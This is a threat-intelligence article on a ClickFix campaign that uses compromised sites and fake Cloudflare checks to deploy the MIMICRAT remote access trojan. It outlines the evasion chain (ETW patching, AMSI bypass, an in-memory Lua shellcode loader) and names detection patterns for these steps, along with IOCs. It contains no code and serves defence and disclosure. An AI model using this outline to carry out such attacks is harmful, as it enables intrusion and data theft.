ClickFix Campaign Compromises Legitimate Sites to Deploy MIMICRAT — A Custom C++ RAT With 22 Post-Exploitation Commands

Elastic Security Labs has disclosed a new ClickFix campaign that leverages compromised legitimate websites as delivery infrastructure to deploy a previously undocumented remote access trojan dubbed MIMICRAT (also tracked as AstarionRAT).

The campaign, discovered earlier this month, demonstrates significant operational sophistication — from multi-stage PowerShell chains that bypass Windows security controls to a custom C++ implant that communicates over HTTPS using HTTP profiles designed to mimic legitimate web analytics traffic.

The suspected end goal is ransomware deployment or data exfiltration.

Compromised Legitimate Sites as Delivery Infrastructure

The infection chain begins with compromised websites spanning multiple industries and geographies. In the case documented by Elastic, the entry point was bincheck[.]io, a legitimate Bank Identification Number (BIN) validation service that was breached to inject malicious JavaScript.

The injected script loads an externally hosted PHP script that serves a fake Cloudflare verification page — the signature ClickFix social engineering technique — instructing the victim to copy and paste a command into the Windows Run dialog to "verify" themselves.

The campaign supports 17 languages, with lure content dynamically localized based on the victim's browser language settings to maximize reach. Identified victims span multiple geographies, including a U.S.-based university and Chinese-speaking users documented in public forum discussions.

Multi-Stage Evasion Chain

The ClickFix lure triggers a PowerShell execution chain designed to systematically dismantle Windows defensive controls before payload delivery:

1. Initial PowerShell command contacts the C2 server to retrieve a second-stage script
2. ETW patching — disables Windows Event Tracing to blind security monitoring
3. AMSI bypass — patches the Antimalware Scan Interface to prevent PowerShell script detection
4. Lua-based loader — drops a Lua scripting engine that decrypts and executes shellcode entirely in memory
5. MIMICRAT deployment — the final payload is loaded without touching disk

MIMICRAT Capabilities

MIMICRAT is a custom C++ implant with a comprehensive feature set across 22 commands for post-exploitation operations:

• Windows token impersonation — escalate privileges by stealing tokens from other processes
• SOCKS5 proxy tunneling — route attacker traffic through the victim's network
• Process and file system control — enumerate, create, modify, and terminate processes and files
• Interactive shell access — direct command-line access to the compromised system
• Shellcode injection — inject and execute arbitrary code in remote processes
• HTTPS C2 communication — all traffic flows over port 443 using HTTP profiles that resemble legitimate web analytics, blending into normal network traffic

Links to Matanbuchus 3.0

Elastic assesses that the campaign shares tactical and infrastructural overlaps with a separate ClickFix campaign documented by Huntress that deploys the Matanbuchus 3.0 loader. That loader serves as a delivery mechanism for the same MIMICRAT implant, suggesting a shared operator or affiliate relationship between the two campaigns.

IOCs

• Compromised site: bincheck[.]io
• C2 communication: HTTPS over port 443 with web analytics-style HTTP profiles
• Loader: Lua-based in-memory shellcode decryptor
• Implant: MIMICRAT/AstarionRAT (C++ RAT, 22 commands)

Defender Recommendations

• Monitor for ClickFix patterns — alert on PowerShell execution spawned from mshta.exe or the Windows Run dialog, particularly following browser activity
• Detect ETW and AMSI tampering — flag processes that patch EtwEventWrite or AmsiScanBuffer in memory
• Hunt for Lua script execution — Lua interpreters running in enterprise environments are anomalous and should be investigated
• Inspect HTTPS traffic — look for C2 beaconing patterns disguised as web analytics on port 443
• Block known infrastructure — add bincheck[.]io to blocklists until confirmed remediated
• Review ClickFix awareness training — remind users that legitimate services never ask them to paste commands into the Run dialog